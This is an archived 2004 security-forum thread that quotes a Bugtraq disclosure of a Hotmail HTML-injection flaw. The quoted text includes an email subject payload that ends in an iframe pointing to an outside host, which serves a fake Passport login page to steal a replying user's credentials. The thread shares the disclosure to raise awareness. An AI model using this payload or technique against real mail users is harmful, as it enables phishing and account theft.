Spyware Warrior Spyware Warrior
Help with Spyware, Hijacking & Other Internet Nuisances
 
FAQ :: Search :: Memberlist :: Usergroups :: Register
Profile :: Log in to check your private messages :: Log in

Hotmail Security Alert

 
Post new topic   Reply to topic    Spyware Warrior Forum Index -> Security Notices & News
View previous topic :: View next topic  
Author Message
anti-trojan.org
Guest






PostPosted: Sat Mar 20, 2004 3:46 pm    Post subject: Hotmail Security Alert Reply with quote

This was posted on bugtraq about 3 days ago. It makes interesting reading.

I have quoted directly from here
http://www.securityfocus.com/archive/1/357896

Quote:
Thursday, March 18, 2004

Unbelievably ridiculous insertion of arbitrary html into the
Hotmail web based email account of your targeted "buddy".

In order to gain your "little pal's" credentials, simply send
him or her an email with an extra long subject like so:

heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddy<iframe src="http://www.malware.com/pithy.html">

Where our iframe points to window.open along with our trojanised
passport re-sign in page. When your "chum" replies to your
email, our iframe is rendered out of sight in the message body
of the email and up goes our error window requesting him to
login again. Only this time he'll be sending you his credentials.

Notes:

1. this is too pathetic for words. Cursory checking of all
settings in hotmail 'reply to' suggests there is no de-
activation of html email when composing a reply.
2. consideration was given to informing the owner of this
particular web based mail service of this particular issue
however we have not used such a poor service in recent years. So
much so one can only suspect that such a slovenly operation is
intentional in order to force account users to upgrade to the
pay service:

a) as of three hours from time of writing we are still awaiting
receipt of emails into the hotmail account from eight [that's
numeral 8] different mail servers. Internal mail messages are
instant, but three hours for external is completely unacceptable.
constant 'server is busy' errors. What does 40 billion
dollars buy you today. More acreage around your acreage for more
privacy.
initiation and re-activation of a dormant account of the free
webmail account from the owner of this particular web based mail
service requires a magnifying glass to see. if you don't have
one, you're liable to select the pay for service as it appears
there are no other choices.
c) use yahoo mail. Instant receipt of emails from any mail
server all the time. Reply to html email subject filters tags.

End Call
Back to top
wawadave
Warrior Obsessed


Joined: 25 Jan 2004
Last Visit: 24 Jul 2009
Posts: 3448
Location: Illegitimus non carborundum

PostPosted: Sat Mar 20, 2004 5:05 pm    Post subject: Reply with quote

hello
thx for the info!!!
_________________
RFID tags! SPYWARE
Tired of proprietary Cor-pirationware?
http://www.openoffice.org/
Installing Vista http://tinyurl.com/2l9qyd
Back to top
View user's profile Send private message Send e-mail Visit poster's website
Display posts from previous:   
Post new topic   Reply to topic    Spyware Warrior Forum Index -> Security Notices & News All times are GMT - 8 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



smartBlue Style © 2002 Smartor
Powered by phpBB © 2001, 2002 phpBB Group